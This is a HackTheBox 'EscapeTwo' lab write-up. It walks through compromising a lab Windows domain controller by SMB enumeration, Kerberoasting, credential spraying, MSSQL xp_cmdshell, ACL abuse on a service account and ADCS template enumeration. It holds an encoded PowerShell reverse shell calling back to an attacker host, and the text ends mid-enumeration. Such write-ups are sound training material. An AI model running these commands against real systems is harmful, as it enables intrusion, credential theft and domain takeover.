WriteupsHTB — EscapeTwo
ADMediumWindows
HTB — EscapeTwo
MSSQL with xp_cmdshell after credential spraying. ADCS ESC4 template modification for certificate impersonation to gain Domain Admin.
January 13, 2025HackTheBox
#AD#MSSQL#ADCS#ESC4
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 00:00 EST
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 36.56% done; ETC: 00:02 (0:01:16 remaining)
Nmap scan report for 10.10.11.51
Host is up (0.021s latency).
Not shown: 65509 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 05:01:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T04:15:16
|_Not valid after: 2055-01-13T04:15:16
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49684/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
49801/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-13T05:02:43
|_ start_date: N/A
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 18.33 ms 10.10.14.1
2 18.81 ms 10.10.11.51445/tcp open
sh
445/tcp open microsoft-ds?sh
smbclient -L \\\\10.10.11.51 -U "sequel.htb/rose"
Password for [SEQUEL.HTB\rose]:
Sharename Type Comment
--------- ---- -------
Accounting Department Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablesh
smbclient \\\\10.10.11.51\\"Accounting Department" -U "sequel.htb/rose"
Password for [SEQUEL.HTB\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024sh
smb: \> get accounts.xlsx
smb: \> get accounting_2024.xlsxusers
sh
nxc smb 10.10.11.51 -u rose -p 'KxEPkKe6R8su' --users
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.51 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.10.11.51 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.51 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.10.11.51 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.10.11.51 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.10.11.51 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.10.11.51 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.10.11.51 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.10.11.51 445 DC01 ca_svc 2025-01-13 13:57:29 0
SMB 10.10.11.51 445 DC01 [*] Enumerated 9 local users: SEQUELbloodhound
sh
sudo bloodhound-python -u 'rose' -p 'KxEPkKe6R8su' -ns 10.10.11.51 -d sequel.htb -c all
zip -r sequel.htb.zip *.jsonkerberoastable
ACL Abuse
display all computers
sh
GetUserSPNs.py -dc-ip 10.10.11.51 sequel.htb/rose -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- ---------------------------------------------------- -------------------------- -------------------------- ----------
sequel.htb/sql_svc.DC01 sql_svc CN=SQLRUserGroupSQLEXPRESS,CN=Users,DC=sequel,DC=htb 2024-06-09 03:58:42.689521 2025-01-12 23:15:09.814500
sequel.htb/ca_svc.DC01 ca_svc CN=Cert Publishers,CN=Users,DC=sequel,DC=htb 2025-01-13 11:42:29.522032 2025-01-13 00:14:18.006496
[-] CCache file is not found. Skipping...
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$6edc7db2...$1bbfc6762bdbf2815dbf5b226b266c0267c7b45593b38f0171965ceb1f23a42c454ae2e756fff8a93f1bba1b37dba379b9432d0bd4c384664f81cafe9ce311e68419017fde5d4ec55e50d4d6d6968b36ff0d56c2afcfb59dcc4bf68e6c0c7a3aceaffe1b698d84b03c1b1577f53ec2b54456a1e11e0c36cae69e9343eb3af82c11389f099a2f1087a0881d12af69b494650737d5c693b02bc2385e4ceaf299e06d74251e884683503f72bbaddb31a7c5f434d731cc0b59f1b0f56fd4c1a49e00c52330db11be7856d62f242784683a93aa0ee16fbcb8358101403340cf14a081d27d20095e91a8e59631f9eabd233b84900a5d665fd966b80c4a834b248c91f34f75997774fe3cf6def2e970641eb0a00bde2b42d74cf11207cfdf72de1deff4918afd6fbc1fbcd54841390325d9299f47b686580f0de169dae239752bce14fd3f02620c67995432245d55fabf3c7d2fde4e374068de77e8050dd625317f61ab202a877891c4181132c5a3a7985bdb8773f2803bcaf5378341ef714f18ee0b9ac479c1a37e6af6e24b74af8b1473e2a928d3f5eae0a46b16f4d4fe820a8e41b419f7bb5188a9f0437dbb09f3bbb70a7385bc714779ff6ed477e58bbfb685aeaf5dce89470cc5ed46964e787e695a0ea6f85693f756b822fa029e9ace5b6cc152d3891a1a2904890826e486a9a245ccf4d7ae425ac7a0ab2ce66d88de6cf90f62445510ab038d7ee2ac11d9c5ecec48495a61880f3959cb0d4562a7cc33cd4cc9181461643067af6a685706849e3affde244944347a5e927975eb30a4e57e06fcfc7e5dd2979b770cc0bcd7296e7cb7c0441edd33468fae9cbd2315314ae4e111dde2f1d61965533a3cc84167b3167e6b1f0db2d7fd09f8f69e43aa3fefa44c4c0cf6639b40beae35bee1226ce874b14e7b422cb6eeada1438b24445b2d00b1e00d24ffb20c144968068e5f23616dd54a1be0eb3ab517fd90c79d41a0c3b30d253462cb73579eafb54c4f010dab04613f0425625c64b3ae47dfe35a36db169f9002d6bc3c0a3aa90d6a22791e7211e1a595005499afdc62342df9ee368ee3143e0014e4050cb889d8f0bed6ab4859a1459dd2383c39799cdc2bf65632549a7ea61fb23734c6fbf3b86612cb0b44e05649476f5063d2ce349624421dfa4e7d206c36f48bc3a92f2ee25844a80944b556c7f397b54c270cc3b4d9f7d2d0f04a6f01b6b26d2b04a1111a35741588d0301f09968829dd5e271d5468ce788791bf5b7de72f6daf7ba93456a55692309cd61202b7b110e70f9e6be8b678b0d36986ff2955860619a3ff353c0a5a9ee6846836de9e6c62f16e1aff92750ca7ef8b7d9ac21a5614a12969dcef7d4c90768615942691519ec814c72159caa7916f2a69c908ad07f26f26145fa6d58fb9e4d074b8
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$6b0d1758...$9587efcbaca5a893311088227bedc43c8e993fa99befc41096a6bac2f4816dac1b1006c7e6f53cf88fd56deb1e9dfb12dc0df308183f0742b494985cac2275010760be38514fc62bc06cdc98143c8269884beab696d7a22138572ff389a2e73554b69a86dc6746daf374d8eac0466b80ad6c6da01469adb733f3b6dcabb4a427de2351d2030e97dd9cc330b0840a2dba4e0068c893da4827b38ff7e02bd2124a63773223abc272cadbf7ac56483e98944f0537fe42bcdb1cbcc6a9fc0f7ef26168f1d41416d20c9639f132a14b3fbcff0abdadaf299cbc363a75d164538511285b65c81be42047c0d527e4edd31f089b44f63c3cb05550f5f2ecfb7ee909e16be99bfbe3a6326d35ca477f72c6e80eaa52a810de746fa82ffc1a7c7581c7d7e8c38d7354144e1829da9c7e22e00b27120ee3fd97372b15faf23212229b5958e674270e75b1a839d9b31134136ca886612a7e4c62a9f3830b946e61cfb3fd9cfd29aac057d97372a23460530087eb9f88181dc1ec56093006d41faad16d1e60665a88a2d49876b6044367600822dd0aa574ee29d643e0d03f74a7d1f476aca29fedb99555964ef3bcf718ec5f7a0cc67f2b533ec385b446337732cc5b8462f17b241f5099d82d45c12e25a6c0911ba96bb3aa910112e3e55bd72651902a48ac0285c56e29a1d7444363174fab522e1aeb83eb2d99652b0ba63f242f6aebc2744279f80398bf0782093e510d334f812b0341fdc76edd4e2cafeb423fd9ddeb805fd3df162789a695006a8536f48c15900d9b9d307cbe95adfbe5898f5443a60c787106232f4dd5945ed6c6c94a1ddc7e8ebf99bd72666c6f39ef27ef14b1fd442ee1e8561cd783e8d6dc92cf6924f74bbf2a897f60921658e18b95ef644995874b75ac508171b9b9c02e10a5919ba890ab777e86c39b84fd22644b744b93067afa410c76f04fcce4509b9f792a2c622a874df1535fd8a3d2ec40f93e03f31d494f464a4baba871042bb55f997e5e397eff9360ed17268177f6b7ded4fc904d447308327d183ac82cb17bc347cef652a8113554464cead0b26c15c017a3fd15ebd4a6826f1ed40d109724538887fe9711a804370cd5f2e014ff3cfa141ec837e13bb03356701e75f69b8c0b7bd7b9cc39e60b25c93132eda7539dc2c4b812df0fb01e2bfdc8a16e188be3cd24d897187f6e500a239b6774273dc10d54298db1d4aae2b87797efefa808cdfa12ae12179ba0a1e4e4a1c3fe2c9010b6bdaf7f1c3a5cfe1937e254c0b375d06ca27e5f485b7d9a8b8f54bb73dbfe3be64798aaafab2258f64be3957b12ae10274ec0c7ca64ab1f9fed1bf4a37cafc1408ebf23e1529e7e6762723d76cbab467863f1e9f6fe4656b905c71bd76fa2c98cf69a52569ad222f8dcb9f9f29a0a42b2796258cf42sh
nxc smb 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [-] sequel.htb\Administrator:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\michael:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ryan:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\sql_svc:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ca_svc:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\rose:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\Administrator:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\michael:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ryan:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG valid creds
oscar:86LxLBMgEWaKUnBG
accounts.xlsx
- conver the
xlsxfile tozipunzip and will be able to read theshareStrings.xmlto retrieve important information such as password
xml
cat sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst> sh
nxc mssql 10.10.11.51 -u sa -p 'MSSQLP@ssw0rd!' --local-auth
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)sa:sequel.htb:MSSQLP@ssw0rd!
1433/tcp open ms-sql-s
sh
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T04:15:16
|_Not valid after: 2055-01-13T04:15:16
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433sh
impacket-mssqlclient sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> sh
SQL (sa dbo@master)> SELECT name FROM master.dbo.sysdatabases
name
------
master
tempdb
model
msdb
enable xp_cmdshell
sh
SQL (sa dbo@master)> EXECUTE sp_configure 'show advanced options', 1
SQL (sa dbo@master)> reconfigure
SQL (sa dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
SQL (sa dbo@master)> reconfigure
SQL (sa dbo@master)> EXECUTE xp_cmdshell 'whoami'
output
--------------
sequel\sql_svc
NULL sh
SQL (sa dbo@master)> EXECUTE xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.51] 57186
whoam
PS C:\Windows\system32> whoami
sequel\sql_svcsh
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=Truesh
nxc smb 10.10.11.51 -u users.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\michael:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\rose:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILUREreuse password
ryan:
user.txt
sh
evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3'
*Evil-WinRM* PS C:\Users\ryan\desktop> cat user.txt
2033c4d1...WriteOwner to CA_SVC
sh
*Evil-WinRM* PS C:\Users\ryan> upload /opt/windows/PowerView.ps1
*Evil-WinRM* PS C:\Users\ryan> Import-Module .\PowerView.ps1forcechange password
sh
$SecPassword = ConvertTo-SecureString 'WqSZAF6CysDQbGb3' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('sequel.htb\ryan', $SecPassword)sh
*Evil-WinRM* PS C:\Users\ryan> Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity "ryan" -Credential $Credsh
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan" powershell
Get-DomainUser | Where-Object { $_.Name -like "*ryan*" } | Select-Object Name, Objectsid
name objectsid
---- ---------
Ryan Howard S-1-5-21-548670397-972687484-3496335370-1114sh
Get-DomainObjectAcl -Identity 'ca_svc' | Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' }
ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
ObjectSID : S-1-5-21-548670397-972687484-3496335370-1607
ActiveDirectoryRights : GenericAll
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-548670397-972687484-3496335370-1114
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : Nonesh
$SecPassword = ConvertTo-SecureString 'WqSZAF6CysDQbGb3' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('sequel.htb\ryan', $SecPassword)sh
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forcesh
Set-DomainUserPassword -Identity ca_svc -AccountPassword $UserPassword -Credential $Credsh
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : SEQUEL
DefaultUserName : Administrator- this worked had to run multiple times
sh
owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' SEQUEL/ryan:WqSZAF6CysDQbGb3 -dc-ip 10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!sh
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'SEQUEL.HTB'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250113-180329.bak
[*] DACL modified successfully!sh
net rpc password "ca_svc" 'ThisIsStrong123!..' -U "ryan"%"WqSZAF6CysDQbGb3" -S "10.10.11.51"sh
nxc smb 10.10.11.51 -u ca_svc -p 'ThisIsStrong123!..'
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\ca_svc:ThisIsStrong123!.. 
sh
*Evil-WinRM* PS C:\Users\ryan> upload /opt/windows/Certify.exesh
*Evil-WinRM* PS C:\users\ryan> net user CA_SVC 'ThisIsStrong123!..' enumerating vulnerable CA templates
sh
*Evil-WinRM* PS C:\users\ryan> .\certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC01-CA'
Enterprise CA Name : sequel-DC01-CA
DNS Hostname : DC01.sequel.htb
FullName : DC01.sequel.htb\sequel-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC01-CA, DC=sequel, DC=htb
Cert Thumbprint : 4C4A178BF30A37D8E21D5C5CE634C8552E5769F9
Cert Serial : 152DBD2D8E9C079742C0F3BFF2A211D3
Cert Start Date : 6/8/2024 9:50:40 AM
Cert End Date : 6/8/2124 10:00:40 AM
Cert Chain : CN=sequel-DC01-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates SEQUEL\Domain Admins S-1-5-21-548670397-972687484-3496335370-512
Allow ManageCA, ManageCertificates SEQUEL\Enterprise Admins S-1-5-21-548670397-972687484-3496335370-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : DC01.sequel.htb\sequel-DC01-CA
Template Name : DunderMifflinAuthentication
Schema Version : 2
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
